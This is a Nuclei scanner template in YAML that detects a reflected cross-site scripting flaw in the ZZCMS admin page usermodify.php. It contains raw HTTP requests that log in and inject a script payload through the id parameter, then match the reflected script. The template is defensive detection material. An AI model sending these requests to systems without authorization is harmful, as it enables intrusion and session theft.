40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: zzcms-xss
|
|
|
|
info:
|
|
name: ZZCMS - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://github.com/JcQSteven/blog/issues/20
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
tags: zzcms,xss,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin/logincheck.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
admin={{username}}&pass={{password}}
|
|
- |
|
|
GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(header_2, 'text/html')"
|
|
- "status_code_2 == 200"
|
|
- 'contains(body_2, "参数 1\"+alert(document.domain)+")'
|
|
condition: and
|
|
|
|
# digest: 490a0046304402201917e4069e1b48e9d4eabf8f7da2dcc9ca0c0e4bfb3848588e7a9d275c574c50022006b83ad4a74ed8d04f09feb25dfda884ab4434abae22912fee1fe511515d442d:922c64590222798bb761d5b6d8e72950
|